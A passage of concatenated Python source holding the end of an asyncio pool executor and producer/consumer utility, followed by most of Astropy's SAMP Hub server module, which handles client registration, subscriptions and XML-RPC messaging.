future = asyncio.run_coroutine_threadsafe(self._produce(func, *args, **kwargs), self.loop) # 这个 run_coroutine_threadsafe 方法也有缺点,消耗的性能巨大。
future.result() # 阻止过快放入,放入超过队列大小后,使submit阻塞。
async def _produce(self, func, *args, **kwargs):
await self._queue.put((func, args, kwargs))
async def _consume(self):
while True:
func, args, kwargs = await self._queue.get()
if isinstance(func, str) and func.startswith('stop'):
# self.logger.debug(func)
break
# noinspection PyBroadException,PyUnusedLocal
try:
await func(*args, **kwargs)
except Exception as e:
traceback.print_exc()
# self._queue.task_done()
async def __run(self):
for _ in range(self._size):
asyncio.ensure_future(self._consume())
def _start_loop_in_new_thread(self, ):
# self._loop.run_until_complete(self.__run()) # 这种也可以。
# self._loop.run_forever()
# asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(asyncio.wait([self._consume() for _ in range(self._size)], loop=self.loop))
self._can_be_closed_flag = True
def shutdown(self):
if self.loop.is_running(): # 这个可能是atregster触发,也可能是用户手动调用,需要判断一下,不能关闭两次。
for i in range(self._size):
self.submit(f'stop{i}', )
while not self._can_be_closed_flag:
time.sleep(0.1)
self.loop.stop()
self.loop.close()
print('关闭循环')
class AsyncProducerConsumer:
"""
参考 https://asyncio.readthedocs.io/en/latest/producer_consumer.html 官方文档。
A simple producer/consumer example, using an asyncio.Queue:
"""
"""
边生产边消费。此框架没用到这个类,这个要求生产和消费在同一个线程里面,对原有同步方式的框架代码改造不方便。
"""
def __init__(self, items, concurrent_num=200, consume_fun_specify=None):
"""
:param items: 要消费的参数列表
:param concurrent_num: 并发数量
:param consume_fun_specify: 指定的异步消费函数对象,如果不指定就要继承并重写consume_fun函数。
"""
self.queue = asyncio.Queue()
self.items = items
self._concurrent_num = concurrent_num
self.consume_fun_specify = consume_fun_specify
async def produce(self):
for item in self.items:
await self.queue.put(item)
async def consume(self):
while True:
# wait for an item from the producer
item = await self.queue.get()
# process the item
# print('consuming {}...'.format(item))
# simulate i/o operation using sleep
try:
if self.consume_fun_specify:
await self.consume_fun_specify(item)
else:
await self.consume_fun(item)
except Exception as e:
print(e)
# Notify the queue that the item has been processed
self.queue.task_done()
@staticmethod
async def consume_fun(item):
"""
要么继承此类重写此方法,要么在类的初始化时候指定consume_fun_specify为一个异步函数。
:param item:
:return:
"""
print(item, '请重写 consume_fun 方法')
await asyncio.sleep(1)
async def __run(self):
# schedule the consumer
tasks = []
for _ in range(self._concurrent_num):
task = asyncio.ensure_future(self.consume())
tasks.append(task)
# run the producer and wait for completion
await self.produce()
# wait until the consumer has processed all items
await self.queue.join()
# the consumer is still awaiting for an item, cancel it
for task in tasks:
task.cancel()
def start_run(self):
loop = asyncio.get_event_loop()
loop.run_until_complete(self.__run())
# loop.close()
if __name__ == '__main__':
def test_async_pool_executor():
from funboost.concurrent_pool import CustomThreadPoolExecutor as ThreadPoolExecutor
# from concurrent.futures.thread import ThreadPoolExecutor
# noinspection PyUnusedLocal
async def f(x):
# await asyncio.sleep(0.1)
pass
print('打印', x)
# await asyncio.sleep(1)
# raise Exception('aaa')
def f2(x):
pass
# time.sleep(0.001)
print('打印', x)
print(1111)
t1 = time.time()
# pool = AsyncPoolExecutor(200)
pool = ThreadPoolExecutor(200) # 协程不能用线程池运行,否则压根不会执行print打印,对于一部函数 f(x)得到的是一个协程,必须进一步把协程编排成任务放在loop循环里面运行。
for i in range(1, 50001):
print('放入', i)
pool.submit(f2, i)
# time.sleep(5)
# pool.submit(f, 'hi')
# pool.submit(f, 'hi2')
# pool.submit(f, 'hi3')
# print(2222)
pool.shutdown()
print(time.time() - t1)
async def _my_fun(item):
print('嘻嘻', item)
# await asyncio.sleep(1)
def test_async_producer_consumer():
AsyncProducerConsumer([i for i in range(100000)], concurrent_num=200, consume_fun_specify=_my_fun).start_run()
print('over')
test_async_pool_executor()
# test_async_producer_consumer()
|
hub.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import copy
import os
import select
import socket
import threading
import time
import uuid
import warnings
from ..extern.six.moves import queue, range
from ..extern.six.moves import xmlrpc_client as xmlrpc
from ..extern.six.moves.urllib.parse import urlunparse
from .. import log
from .constants import SAMP_STATUS_OK
from .constants import __profile_version__
from .errors import SAMPWarning, SAMPHubError, SAMPProxyError
from .utils import internet_on, ServerProxyPool, _HubAsClient
from .lockfile_helpers import read_lockfile, create_lock_file
from .standard_profile import ThreadingXMLRPCServer
from .web_profile import WebProfileXMLRPCServer, web_profile_text_dialog
__all__ = ['SAMPHubServer', 'WebProfileDialog']
__doctest_skip__ = ['.', 'SAMPHubServer.*']
class SAMPHubServer(object):
"""
SAMP Hub Server.
Parameters
----------
secret : str, optional
The secret code to use for the SAMP lockfile. If none is is specified,
the :func:`uuid.uuid1` function is used to generate one.
addr : str, optional
Listening address (or IP). This defaults to 127.0.0.1 if the internet
is not reachable, otherwise it defaults to the host name.
port : int, optional
Listening XML-RPC server socket port. If left set to 0 (the default),
the operating system will select a free port.
lockfile : str, optional
Custom lockfile name.
timeout : int, optional
Hub inactivity timeout. If ``timeout > 0`` then the Hub automatically
stops after an inactivity period longer than ``timeout`` seconds. By
default ``timeout`` is set to 0 (Hub never expires).
client_timeout : int, optional
Client inactivity timeout. If ``client_timeout > 0`` then the Hub
automatically unregisters the clients which result inactive for a
period longer than ``client_timeout`` seconds. By default
``client_timeout`` is set to 0 (clients never expire).
mode : str, optional
Defines the Hub running mode. If ``mode`` is ``'single'`` then the Hub
runs using the standard ``.samp`` lock-file, having a single instance
for user desktop session. Otherwise, if ``mode`` is ``'multiple'``,
then the Hub runs using a non-standard lock-file, placed in
``.samp-1`` directory, of the form ``samp-hub-<UUID>``, where
``<UUID>`` is a unique UUID assigned to the hub.
label : str, optional
A string used to label the Hub with a human readable name. This string
is written in the lock-file assigned to the ``hub.label`` token.
web_profile : bool, optional
Enables or disables the Web Profile support.
web_profile_dialog : class, optional
Allows a class instance to be specified using ``web_profile_dialog``
to replace the terminal-based message with e.g. a GUI pop-up. Two
`queue.Queue` instances will be added to the instance as attributes
``queue_request`` and ``queue_result``. When a request is received via
the ``queue_request`` queue, the pop-up should be displayed, and a
value of `True` or `False` should be added to ``queue_result``
depending on whether the user accepted or refused the connection.
web_port : int, optional
The port to use for web SAMP. This should not be changed except for
testing purposes, since web SAMP should always use port 21012.
pool_size : int, optional
The number of socket connections opened to communicate with the
clients.
"""
def __init__(self, secret=None, addr=None, port=0, lockfile=None,
timeout=0, client_timeout=0, mode='single', label="",
web_profile=True, web_profile_dialog=None, web_port=21012,
pool_size=20):
# Generate random ID for the hub
self._id = str(uuid.uuid1())
# General settings
self._is_running = False
self._customlockfilename = lockfile
self._lockfile = None
self._addr = addr
self._port = port
self._mode = mode
self._label = label
self._timeout = timeout
self._client_timeout = client_timeout
self._pool_size = pool_size
# Web profile specific attributes
self._web_profile = web_profile
self._web_profile_dialog = web_profile_dialog
self._web_port = web_port
self._web_profile_server = None
self._web_profile_callbacks = {}
self._web_profile_requests_queue = None
self._web_profile_requests_result = None
self._web_profile_requests_semaphore = None
self._host_name = "127.0.0.1"
if internet_on():
try:
self._host_name = socket.getfqdn()
socket.getaddrinfo(self._addr or self._host_name,
self._port or 0)
except socket.error:
self._host_name = "127.0.0.1"
# Threading stuff
self._thread_lock = threading.Lock()
self._thread_run = None
self._thread_hub_timeout = None
self._thread_client_timeout = None
self._launched_threads = []
# Variables for timeout testing:
self._last_activity_time = None
self._client_activity_time = {}
# Hub message id counter, used to create hub msg ids
self._hub_msg_id_counter = 0
# Hub secret code
self._hub_secret_code_customized = secret
self._hub_secret = self._create_secret_code()
# Hub public id (as SAMP client)
self._hub_public_id = ""
# Client ids
# {private_key: (public_id, timestamp)}
self._private_keys = {}
# Metadata per client
# {private_key: metadata}
self._metadata = {}
# List of subscribed clients per MType
# {mtype: private_key list}
self._mtype2ids = {}
# List of subscribed MTypes per client
# {private_key: mtype list}
self._id2mtypes = {}
# List of XML-RPC addresses per client
# {public_id: (XML-RPC address, ServerProxyPool instance)}
self._xmlrpc_endpoints = {}
# Synchronous message id heap
self._sync_msg_ids_heap = {}
# Public ids counter
self._client_id_counter = -1
@property
def id(self):
"""
The unique hub ID.
"""
return self._id
def _register_standard_api(self, server):
# Standard Profile only operations
server.register_function(self._ping, 'samp.hub.ping')
server.register_function(self._set_xmlrpc_callback, 'samp.hub.setXmlrpcCallback')
# Standard API operations
server.register_function(self._register, 'samp.hub.register')
server.register_function(self._unregister, 'samp.hub.unregister')
server.register_function(self._declare_metadata, 'samp.hub.declareMetadata')
server.register_function(self._get_metadata, 'samp.hub.getMetadata')
server.register_function(self._declare_subscriptions, 'samp.hub.declareSubscriptions')
server.register_function(self._get_subscriptions, 'samp.hub.getSubscriptions')
server.register_function(self._get_registered_clients, 'samp.hub.getRegisteredClients')
server.register_function(self._get_subscribed_clients, 'samp.hub.getSubscribedClients')
server.register_function(self._notify, 'samp.hub.notify')
server.register_function(self._notify_all, 'samp.hub.notifyAll')
server.register_function(self._call, 'samp.hub.call')
server.register_function(self._call_all, 'samp.hub.callAll')
server.register_function(self._call_and_wait, 'samp.hub.callAndWait')
server.register_function(self._reply, 'samp.hub.reply')
def _register_web_profile_api(self, server):
# Web Profile methods like Standard Profile
server.register_function(self._ping, 'samp.webhub.ping')
server.register_function(self._unregister, 'samp.webhub.unregister')
server.register_function(self._declare_metadata, 'samp.webhub.declareMetadata')
server.register_function(self._get_metadata, 'samp.webhub.getMetadata')
server.register_function(self._declare_subscriptions, 'samp.webhub.declareSubscriptions')
server.register_function(self._get_subscriptions, 'samp.webhub.getSubscriptions')
server.register_function(self._get_registered_clients, 'samp.webhub.getRegisteredClients')
server.register_function(self._get_subscribed_clients, 'samp.webhub.getSubscribedClients')
server.register_function(self._notify, 'samp.webhub.notify')
server.register_function(self._notify_all, 'samp.webhub.notifyAll')
server.register_function(self._call, 'samp.webhub.call')
server.register_function(self._call_all, 'samp.webhub.callAll')
server.register_function(self._call_and_wait, 'samp.webhub.callAndWait')
server.register_function(self._reply, 'samp.webhub.reply')
# Methods particularly for Web Profile
server.register_function(self._web_profile_register, 'samp.webhub.register')
server.register_function(self._web_profile_allowReverseCallbacks, 'samp.webhub.allowReverseCallbacks')
server.register_function(self._web_profile_pullCallbacks, 'samp.webhub.pullCallbacks')
def _start_standard_server(self):
self._server = ThreadingXMLRPCServer(
(self._addr or self._host_name, self._port or 0),
log, logRequests=False, allow_none=True)
prot = 'http'
self._port = self._server.socket.getsockname()[1]
addr = "{0}:{1}".format(self._addr or self._host_name, self._port)
self._url = urlunparse((prot, addr, '', '', '', ''))
self._server.register_introspection_functions()
self._register_standard_api(self._server)
def _start_web_profile_server(self):
self._web_profile_requests_queue = queue.Queue(1)
self._web_profile_requests_result = queue.Queue(1)
self._web_profile_requests_semaphore = queue.Queue(1)
if self._web_profile_dialog is not None:
# TODO: Some sort of duck-typing on the web_profile_dialog object
self._web_profile_dialog.queue_request = \
self._web_profile_requests_queue
self._web_profile_dialog.queue_result = \
self._web_profile_requests_result
try:
self._web_profile_server = WebProfileXMLRPCServer(
('localhost', self._web_port), log, logRequests=False,
allow_none=True)
self._web_port = self._web_profile_server.socket.getsockname()[1]
self._web_profile_server.register_introspection_functions()
self._register_web_profile_api(self._web_profile_server)
log.info("Hub set to run with Web Profile support enabled.")
except socket.error:
log.warning("Port {0} already in use. Impossible to run the "
"Hub with Web Profile support.".format(self._web_port),
SAMPWarning)
self._web_profile = False
# Cleanup
self._web_profile_requests_queue = None
self._web_profile_requests_result = None
self._web_profile_requests_semaphore = None
def _launch_thread(self, group=None, target=None, name=None, args=None):
# Remove inactive threads
remove = []
for t in self._launched_threads:
if not t.is_alive():
remove.append(t)
for t in remove:
self._launched_threads.remove(t)
# Start new thread
t = threading.Thread(group=group, target=target, name=name, args=args)
t.start()
# Add to list of launched threads
self._launched_threads.append(t)
def _join_launched_threads(self, timeout=None):
for t in self._launched_threads:
t.join(timeout=timeout)
def _timeout_test_hub(self):
if self._timeout == 0:
return
last = time.time()
while self._is_running:
time.sleep(0.05) # keep this small to check _is_running often
now = time.time()
if now - last > 1.:
with self._thread_lock:
if self._last_activity_time is not None:
if now - self._last_activity_time >= self._timeout:
warnings.warn("Timeout expired, Hub is shutting down!",
SAMPWarning)
self.stop()
return
last = now
def _timeout_test_client(self):
if self._client_timeout == 0:
return
last = time.time()
while self._is_running:
time.sleep(0.05) # keep this small to check _is_running often
now = time.time()
if now - last > 1.:
for private_key in self._client_activity_time.keys():
if (now - self._client_activity_time[private_key] > self._client_timeout
and private_key != self._hub_private_key):
warnings.warn(
"Client {} timeout expired!".format(private_key),
SAMPWarning)
self._notify_disconnection(private_key)
self._unregister(private_key)
last = now
def _hub_as_client_request_handler(self, method, args):
if method == 'samp.client.receiveCall':
return self._receive_call(*args)
elif method == 'samp.client.receiveNotification':
return self._receive_notification(*args)
elif method == 'samp.client.receiveResponse':
return self._receive_response(*args)
elif method == 'samp.app.ping':
return self._ping(*args)
def _setup_hub_as_client(self):
hub_metadata = {"samp.name": "Astropy SAMP Hub",
"samp.description.text": self._label,
"author.name": "The Astropy Collaboration",
"samp.documentation.url": "http://docs.astropy.org/en/stable/vo/samp",
"samp.icon.url": self._url + "/samp/icon"}
result = self._register(self._hub_secret)
self._hub_public_id = result["samp.self-id"]
self._hub_private_key = result["samp.private-key"]
self._set_xmlrpc_callback(self._hub_private_key, self._url)
self._declare_metadata(self._hub_private_key, hub_metadata)
self._declare_subscriptions(self._hub_private_key,
{"samp.app.ping": {},
"x-samp.query.by-meta": {}})
def start(self, wait=False):
"""
Start the current SAMP Hub instance and create the lock file. Hub
start-up can be blocking or non blocking depending on the ``wait``
parameter.
Parameters
----------
wait : bool
If `True` then the Hub process is joined with the caller, blocking
the code flow. Usually `True` option is used to run a stand-alone
Hub in an executable script. If `False` (default), then the Hub
process runs in a separated thread. `False` is usually used in a
Python shell.
"""
if self._is_running:
raise SAMPHubError("Hub is already running")
if self._lockfile is not None:
raise SAMPHubError("Hub is not running but lockfile is set")
if self._web_profile:
self._start_web_profile_server()
self._start_standard_server()
self._lockfile = create_lock_file(lockfilename=self._customlockfilename,
mode=self._mode, hub_id=self.id,
hub_params=self.params)
self._update_last_activity_time()
self._setup_hub_as_client()
self._start_threads()
log.info("Hub started")
if wait and self._is_running:
self._thread_run.join()
self._thread_run = None
@property
def params(self):
"""
The hub parameters (which are written to the logfile)
"""
params = {}
# Keys required by standard profile
params['samp.secret'] = self._hub_secret
params['samp.hub.xmlrpc.url'] = self._url
params['samp.profile.version'] = __profile_version__
# Custom keys
params['hub.id'] = self.id
params['hub.label'] = self._label or "Hub {0}".format(self.id)
return params
def _start_threads(self):
self._thread_run = threading.Thread(target=self._serve_forever)
self._thread_run.daemon = True
if self._timeout > 0:
self._thread_hub_timeout = threading.Thread(
target=self._timeout_test_hub,
name="Hub timeout test")
self._thread_hub_timeout.daemon = True
else:
self._thread_hub_timeout = None
if self._client_timeout > 0:
self._thread_client_timeout = threading.Thread(
target=self._timeout_test_client,
name="Client timeout test")
self._thread_client_timeout.daemon = True
else:
self._thread_client_timeout = None
self._is_running = True
self._thread_run.start()
if self._thread_hub_timeout is not None:
self._thread_hub_timeout.start()
if self._thread_client_timeout is not None:
self._thread_client_timeout.start()
def _create_secret_code(self):
if self._hub_secret_code_customized is not None:
return self._hub_secret_code_customized
else:
return str(uuid.uuid1())
def stop(self):
"""
Stop the current SAMP Hub instance and delete the lock file.
"""
if not self._is_running:
return
log.info("Hub is stopping...")
self._notify_shutdown()
self._is_running = False
if self._lockfile and os.path.isfile(self._lockfile):
lockfiledict = read_lockfile(self._lockfile)
if lockfiledict['samp.secret'] == self._hub_secret:
os.remove(self._lockfile)
self._lockfile = None
# Reset variables
# TODO: What happens if not all threads are stopped after timeout?
self._join_all_threads(timeout=10.)
self._hub_msg_id_counter = 0
self._hub_secret = self._create_secret_code()
self._hub_public_id = ""
self._metadata = {}
self._private_keys = {}
self._mtype2ids = {}
self._id2mtypes = {}
self._xmlrpc_endpoints = {}
self._last_activity_time = None
log.info("Hub stopped.")
def _join_all_threads(self, timeout=None):
# In some cases, ``stop`` may be called from some of the sub-threads,
# so we just need to make sure that we don't try and shut down the
# calling thread.
current_thread = threading.current_thread()
if self._thread_run is not current_thread:
self._thread_run.join(timeout=timeout)
if not self._thread_run.is_alive():
self._thread_run = None
if self._thread_hub_timeout is not None and self._thread_hub_timeout is not current_thread:
self._thread_hub_timeout.join(timeout=timeout)
if not self._thread_hub_timeout.is_alive():
self._thread_hub_timeout = None
if self._thread_client_timeout is not None and self._thread_client_timeout is not current_thread:
self._thread_client_timeout.join(timeout=timeout)
if not self._thread_client_timeout.is_alive():
self._thread_client_timeout = None
self._join_launched_threads(timeout=timeout)
@property
def is_running(self):
"""Return an information concerning the Hub running status.
Returns
-------
running : bool
Is the hub running?
"""
return self._is_running
def _serve_forever(self):
while self._is_running:
try:
read_ready = select.select([self._server.socket], [], [], 0.01)[0]
except select.error as exc:
warnings.warn("Call to select() in SAMPHubServer failed: {0}".format(exc),
SAMPWarning)
else:
if read_ready:
self._server.handle_request()
if self._web_profile:
# We now check if there are any connection requests from the
# web profile, and if so, we initialize the pop-up.
if self._web_profile_dialog is None:
try:
request = self._web_profile_requests_queue.get_nowait()
except queue.Empty:
pass
else:
web_profile_text_dialog(request, self._web_profile_requests_result)
# We now check for requests over the web profile socket, and we
# also update the pop-up in case there are any changes.
try:
read_ready = select.select([self._web_profile_server.socket], [], [], 0.01)[0]
except select.error as exc:
warnings.warn("Call to select() in SAMPHubServer failed: {0}".format(exc),
SAMPWarning)
else:
if read_ready:
self._web_profile_server.handle_request()
self._server.server_close()
if self._web_profile_server is not None:
self._web_profile_server.server_close()
def _notify_shutdown(self):
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.shutdown")
for mtype in msubs:
if mtype in self._mtype2ids:
for key in self._mtype2ids[mtype]:
self._notify_(self._hub_private_key,
self._private_keys[key][0],
{"samp.mtype": "samp.hub.event.shutdown",
"samp.params": {}})
def _notify_register(self, private_key):
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.register")
for mtype in msubs:
if mtype in self._mtype2ids:
public_id = self._private_keys[private_key][0]
for key in self._mtype2ids[mtype]:
# if key != private_key:
self._notify(self._hub_private_key,
self._private_keys[key][0],
{"samp.mtype": "samp.hub.event.register",
"samp.params": {"id": public_id}})
def _notify_unregister(self, private_key):
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.unregister")
for mtype in msubs:
if mtype in self._mtype2ids:
public_id = self._private_keys[private_key][0]
for key in self._mtype2ids[mtype]:
if key != private_key:
self._notify(self._hub_private_key,
self._private_keys[key][0],
{"samp.mtype": "samp.hub.event.unregister",
"samp.params": {"id": public_id}})
def _notify_metadata(self, private_key):
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.metadata")
for mtype in msubs:
if mtype in self._mtype2ids:
public_id = self._private_keys[private_key][0]
for key in self._mtype2ids[mtype]:
# if key != private_key:
self._notify(self._hub_private_key,
self._private_keys[key][0],
{"samp.mtype": "samp.hub.event.metadata",
"samp.params": {"id": public_id,
"metadata": self._metadata[private_key]}
})
def _notify_subscriptions(self, private_key):
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.event.subscriptions")
for mtype in msubs:
if mtype in self._mtype2ids:
public_id = self._private_keys[private_key][0]
for key in self._mtype2ids[mtype]:
self._notify(self._hub_private_key,
self._private_keys[key][0],
{"samp.mtype": "samp.hub.event.subscriptions",
"samp.params": {"id": public_id,
"subscriptions": self._id2mtypes[private_key]}
})
def _notify_disconnection(self, private_key):
def _xmlrpc_call_disconnect(endpoint, private_key, hub_public_id, message):
endpoint.samp.client.receiveNotification(private_key, hub_public_id, message)
msubs = SAMPHubServer.get_mtype_subtypes("samp.hub.disconnect")
public_id = self._private_keys[private_key][0]
endpoint = self._xmlrpc_endpoints[public_id][1]
for mtype in msubs:
if mtype in self._mtype2ids and private_key in self._mtype2ids[mtype]:
log.debug("notify disconnection to {}".format(public_id))
self._launch_thread(target=_xmlrpc_call_disconnect,
args=(endpoint, private_key,
self._hub_public_id,
{"samp.mtype": "samp.hub.disconnect",
"samp.params": {"reason": "Timeout expired!"}}))
def _ping(self):
self._update_last_activity_time()
log.debug("ping")
return "1"
def _query_by_metadata(self, key, value):
public_id_list = []
for private_id in self._metadata:
if key in self._metadata[private_id]:
if self._metadata[private_id][key] == value:
public_id_list.append(self._private_keys[private_id][0])
return public_id_list
def _set_xmlrpc_callback(self, private_key, xmlrpc_addr):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
if private_key == self._hub_private_key:
public_id = self._private_keys[private_key][0]
self._xmlrpc_endpoints[public_id] = \
(xmlrpc_addr, _HubAsClient(self._hub_as_client_request_handler))
return ""
# Dictionary stored with the public id
log.debug("set_xmlrpc_callback: {} {}".format(private_key,
xmlrpc_addr))
server_proxy_pool = None
server_proxy_pool = ServerProxyPool(self._pool_size,
xmlrpc.ServerProxy,
xmlrpc_addr, allow_none=1)
public_id = self._private_keys[private_key][0]
self._xmlrpc_endpoints[public_id] = (xmlrpc_addr,
server_proxy_pool)
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
return ""
def _perform_standard_register(self):
with self._thread_lock:
private_key, public_id = self._get_new_ids()
self._private_keys[private_key] = (public_id, time.time())
self._update_last_activity_time(private_key)
self._notify_register(private_key)
log.debug("register: private-key = {} and self-id = {}"
.format(private_key, public_id))
return {"samp.self-id": public_id,
"samp.private-key": private_key,
"samp.hub-id": self._hub_public_id}
def _register(self, secret):
self._update_last_activity_time()
if secret == self._hub_secret:
return self._perform_standard_register()
else:
# return {"samp.self-id": "", "samp.private-key": "", "samp.hub-id": ""}
raise SAMPProxyError(7, "Bad secret code")
def _get_new_ids(self):
private_key = str(uuid.uuid1())
self._client_id_counter += 1
public_id = 'cli#hub'
if self._client_id_counter > 0:
public_id = "cli#{}".format(self._client_id_counter)
return private_key, public_id
def _unregister(self, private_key):
self._update_last_activity_time()
public_key = ""
self._notify_unregister(private_key)
with self._thread_lock:
if private_key in self._private_keys:
public_key = self._private_keys[private_key][0]
del self._private_keys[private_key]
else:
return ""
if private_key in self._metadata:
del self._metadata[private_key]
if private_key in self._id2mtypes:
del self._id2mtypes[private_key]
for mtype in self._mtype2ids.keys():
if private_key in self._mtype2ids[mtype]:
self._mtype2ids[mtype].remove(private_key)
if public_key in self._xmlrpc_endpoints:
del self._xmlrpc_endpoints[public_key]
if private_key in self._client_activity_time:
del self._client_activity_time[private_key]
if self._web_profile:
if private_key in self._web_profile_callbacks:
del self._web_profile_callbacks[private_key]
self._web_profile_server.remove_client(private_key)
log.debug("unregister {} ({})".format(public_key, private_key))
return ""
def _declare_metadata(self, private_key, metadata):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
log.debug("declare_metadata: private-key = {} metadata = {}"
.format(private_key, str(metadata)))
self._metadata[private_key] = metadata
self._notify_metadata(private_key)
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
return ""
def _get_metadata(self, private_key, client_id):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
client_private_key = self._public_id_to_private_key(client_id)
log.debug("get_metadata: private-key = {} client-id = {}"
.format(private_key, client_id))
if client_private_key is not None:
if client_private_key in self._metadata:
log.debug("--> metadata = {}"
.format(self._metadata[client_private_key]))
return self._metadata[client_private_key]
else:
return {}
else:
raise SAMPProxyError(6, "Invalid client ID")
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _declare_subscriptions(self, private_key, mtypes):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
log.debug("declare_subscriptions: private-key = {} mtypes = {}"
.format(private_key, str(mtypes)))
# remove subscription to previous mtypes
if private_key in self._id2mtypes:
prev_mtypes = self._id2mtypes[private_key]
for mtype in prev_mtypes:
try:
self._mtype2ids[mtype].remove(private_key)
except ValueError: # private_key is not in list
pass
self._id2mtypes[private_key] = copy.deepcopy(mtypes)
# remove duplicated MType for wildcard overwriting
original_mtypes = copy.deepcopy(mtypes)
for mtype in original_mtypes:
if mtype.endswith("*"):
for mtype2 in original_mtypes:
if mtype2.startswith(mtype[:-1]) and \
mtype2 != mtype:
if mtype2 in mtypes:
del(mtypes[mtype2])
log.debug("declare_subscriptions: subscriptions accepted from "
"{} => {}".format(private_key, str(mtypes)))
for mtype in mtypes:
if mtype in self._mtype2ids:
if private_key not in self._mtype2ids[mtype]:
self._mtype2ids[mtype].append(private_key)
else:
self._mtype2ids[mtype] = [private_key]
self._notify_subscriptions(private_key)
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
return ""
def _get_subscriptions(self, private_key, client_id):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
client_private_key = self._public_id_to_private_key(client_id)
if client_private_key is not None:
if client_private_key in self._id2mtypes:
log.debug("get_subscriptions: client-id = {} mtypes = {}"
.format(client_id,
str(self._id2mtypes[client_private_key])))
return self._id2mtypes[client_private_key]
else:
log.debug("get_subscriptions: client-id = {} mtypes = "
"missing".format(client_id))
return {}
else:
raise SAMPProxyError(6, "Invalid client ID")
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _get_registered_clients(self, private_key):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
reg_clients = []
for pkey in self._private_keys.keys():
if pkey != private_key:
reg_clients.append(self._private_keys[pkey][0])
log.debug("get_registered_clients: private_key = {} clients = {}"
.format(private_key, reg_clients))
return reg_clients
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _get_subscribed_clients(self, private_key, mtype):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
sub_clients = {}
for pkey in self._private_keys.keys():
if pkey != private_key and self._is_subscribed(pkey, mtype):
sub_clients[self._private_keys[pkey][0]] = {}
log.debug("get_subscribed_clients: private_key = {} mtype = {} "
"clients = {}".format(private_key, mtype, sub_clients))
return sub_clients
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
@staticmethod
def get_mtype_subtypes(mtype):
"""
Return a list containing all the possible wildcarded subtypes of MType.
Parameters
----------
mtype : str
MType to be parsed.
Returns
-------
types : list
List of subtypes
Examples
--------
>>> from astropy.samp import SAMPHubServer
>>> SAMPHubServer.get_mtype_subtypes("samp.app.ping")
['samp.app.ping', 'samp.app.*', 'samp.*', '*']
"""
subtypes = []
msubs = mtype.split(".")
indexes = list(range(len(msubs)))
indexes.reverse()
indexes.append(-1)
for i in indexes:
tmp_mtype = ".".join(msubs[:i + 1])
if tmp_mtype != mtype:
if tmp_mtype != "":
tmp_mtype = tmp_mtype + ".*"
else:
tmp_mtype = "*"
subtypes.append(tmp_mtype)
return subtypes
def _is_subscribed(self, private_key, mtype):
subscribed = False
msubs = SAMPHubServer.get_mtype_subtypes(mtype)
for msub in msubs:
if msub in self._mtype2ids:
if private_key in self._mtype2ids[msub]:
subscribed = True
return subscribed
def _notify(self, private_key, recipient_id, message):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
if self._is_subscribed(self._public_id_to_private_key(recipient_id),
message["samp.mtype"]) is False:
raise SAMPProxyError(2, "Client {} not subscribed to MType {}"
.format(recipient_id, message["samp.mtype"]))
self._launch_thread(target=self._notify_, args=(private_key,
recipient_id,
message))
return {}
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _notify_(self, sender_private_key, recipient_public_id, message):
if sender_private_key not in self._private_keys:
return
sender_public_id = self._private_keys[sender_private_key][0]
try:
log.debug("notify {} from {} to {}".format(
message["samp.mtype"], sender_public_id,
recipient_public_id))
recipient_private_key = self._public_id_to_private_key(recipient_public_id)
arg_params = (sender_public_id, message)
samp_method_name = "receiveNotification"
self._retry_method(recipient_private_key, recipient_public_id, samp_method_name, arg_params)
except Exception as exc:
warnings.warn("{} notification from client {} to client {} "
"failed [{}]".format(message["samp.mtype"],
sender_public_id,
recipient_public_id, exc),
SAMPWarning)
def _notify_all(self, private_key, message):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
if "samp.mtype" not in message:
raise SAMPProxyError(3, "samp.mtype keyword is missing")
recipient_ids = self._notify_all_(private_key, message)
return recipient_ids
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _notify_all_(self, sender_private_key, message):
recipient_ids = []
msubs = SAMPHubServer.get_mtype_subtypes(message["samp.mtype"])
for mtype in msubs:
if mtype in self._mtype2ids:
for key in self._mtype2ids[mtype]:
if key != sender_private_key:
_recipient_id = self._private_keys[key][0]
recipient_ids.append(_recipient_id)
self._launch_thread(target=self._notify,
args=(sender_private_key,
_recipient_id, message)
)
return recipient_ids
def _call(self, private_key, recipient_id, msg_tag, message):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
if self._is_subscribed(self._public_id_to_private_key(recipient_id),
message["samp.mtype"]) is False:
raise SAMPProxyError(2, "Client {} not subscribed to MType {}"
.format(recipient_id, message["samp.mtype"]))
public_id = self._private_keys[private_key][0]
msg_id = self._get_new_hub_msg_id(public_id, msg_tag)
self._launch_thread(target=self._call_, args=(private_key, public_id,
recipient_id, msg_id,
message))
return msg_id
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _call_(self, sender_private_key, sender_public_id,
recipient_public_id, msg_id, message):
if sender_private_key not in self._private_keys:
return
try:
log.debug("call {} from {} to {} ({})".format(
msg_id.split(";;")[0], sender_public_id,
recipient_public_id, message["samp.mtype"]))
recipient_private_key = self._public_id_to_private_key(recipient_public_id)
arg_params = (sender_public_id, msg_id, message)
samp_methodName = "receiveCall"
